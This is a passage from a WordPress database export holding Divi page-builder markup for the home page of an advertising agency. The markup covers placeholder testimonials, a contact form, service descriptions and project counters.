animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Testimonial Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Testimonial Title\" _builder_version=\"3.25\" custom_margin=\"|||\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"Montserrat|on||on|\" text_text_color=\"#353740\" text_font_size=\"42px\" text_line_height=\"1.2em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\"]<p>From Our Clients</p>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"600px\" module_alignment=\"center\" custom_margin=\"|||\"]Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Testimonial\" _builder_version=\"3.25\" custom_padding=\"|||\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Mitch Skolnik\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_1.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Andrel Nahaev\" job_title=\"operation Director\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_3.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"left\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_testimonial author=\"Eduard Ungureanu\" job_title=\"Tech Support\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_2.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][et_pb_testimonial author=\"Tom Ewer\" job_title=\"Blogger\" company_name=\"Elegant Themes\" portrait_url=\"https://52.66.212.87/wp-content/uploads/2020/07/portraits-circle-small_5.png\" quote_icon=\"off\" _builder_version=\"3.2\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" use_background_color=\"off\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"20%\"]“There are many variations of passages of Lorem Ipsum available, but the majority have suffered alteration by injected humour.”\r[/et_pb_testimonial][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form email=\"dhiraj@wthtest1.in8.cdn-alpha.com\" custom_message=\"Hi my name is %%Name%%, Email id is %%Email%% and Mobile No is %%Mobile_No%%, my message is %%Message%%\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"4.4.9\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Mobile_No\" field_title=\"Mobile No\" fullwidth_field=\"on\" _builder_version=\"4.4.9\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"4.4.9\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','Home','','inherit','closed','closed','','134-revision-v1','','','2020-07-09 20:39:13','2020-07-09 20:39:13','',134,'https://52.66.212.87/2020/07/09/134-revision-v1/',0,'revision','',0),(298,1,'2020-07-09 20:40:29','2020-07-09 20:40:29','[et_pb_section fb_built=\"1\" admin_label=\"Hero\" _builder_version=\"3.22\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row use_custom_gutter=\"on\" gutter_width=\"1\" make_equal=\"on\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"4.4.9\" background_color=\"#fcd21d\" background_image=\"https://52.66.212.87/wp-content/uploads/2020/07/Desktop-HD.png\" width=\"100%\" width_tablet=\"100%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"100%\" max_width_tablet=\"100%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_margin=\"|auto|1px|auto||\" custom_padding=\"50px||50px|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"10%|8%|10%|8%\" custom_padding__hover=\"|||\"][et_pb_text content_tablet=\"\" content_phone=\"<h1 style=%22text-align: center;%22><span style=%22color: #ffffff;%22>Welcome to</span><br /> <span style=%22color: #ffffff;%22> Advertising</span></h1>\n\" content_last_edited=\"on|phone\" _builder_version=\"4.4.9\" text_font=\"||||||||\" text_font_size=\"18px\" header_font=\"Montserrat|700||on|||||\" header_text_color=\"#f7f7f7\" header_font_size=\"76px\" header_line_height=\"1.3em\" custom_margin=\"6px||40px|||\" animation_style=\"zoom\" animation_duration=\"1200ms\" text_font_tablet=\"\" text_font_phone=\"\" text_font_last_edited=\"on|phone\" text_font_size_tablet=\"\" text_font_size_phone=\"12px\" text_font_size_last_edited=\"on|phone\" header_font_size_tablet=\"64px\" header_font_size_phone=\"40px\" header_font_size_last_edited=\"on|phone\" text_text_shadow_style=\"preset1\" locked=\"off\"]<h1 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Welcome to</span><br /> <span style=\"color: #ffffff;\"> Advertising</span></h1>[/et_pb_text][et_pb_button button_text=\"Learn More\" button_alignment=\"center\" _builder_version=\"4.4.9\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"4px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" animation_style=\"zoom\" animation_duration=\"1200ms\" box_shadow_style=\"preset2\" button_text_color_hover=\"#ffffff\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" locked=\"off\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#ffffff\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#ffffff\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Service Section\" _builder_version=\"4.4.9\" custom_margin=\"|||\" custom_padding=\"56px||110px|||\" custom_padding_tablet=\"20px||||false|false\" custom_padding_phone=\"12px||40px||false|false\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>What we do</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it.</span></p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.4.9\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.4.9\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU&t=5s\" image_src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-01.jpg\" _builder_version=\"4.4.9\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.4.9\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.4.9\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||110px|\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://52.66.212.87/wp-content/uploads/2020/07/home-office-07-1.png\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2><span>Why choose us?</span></h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.4.9\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p> <span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" 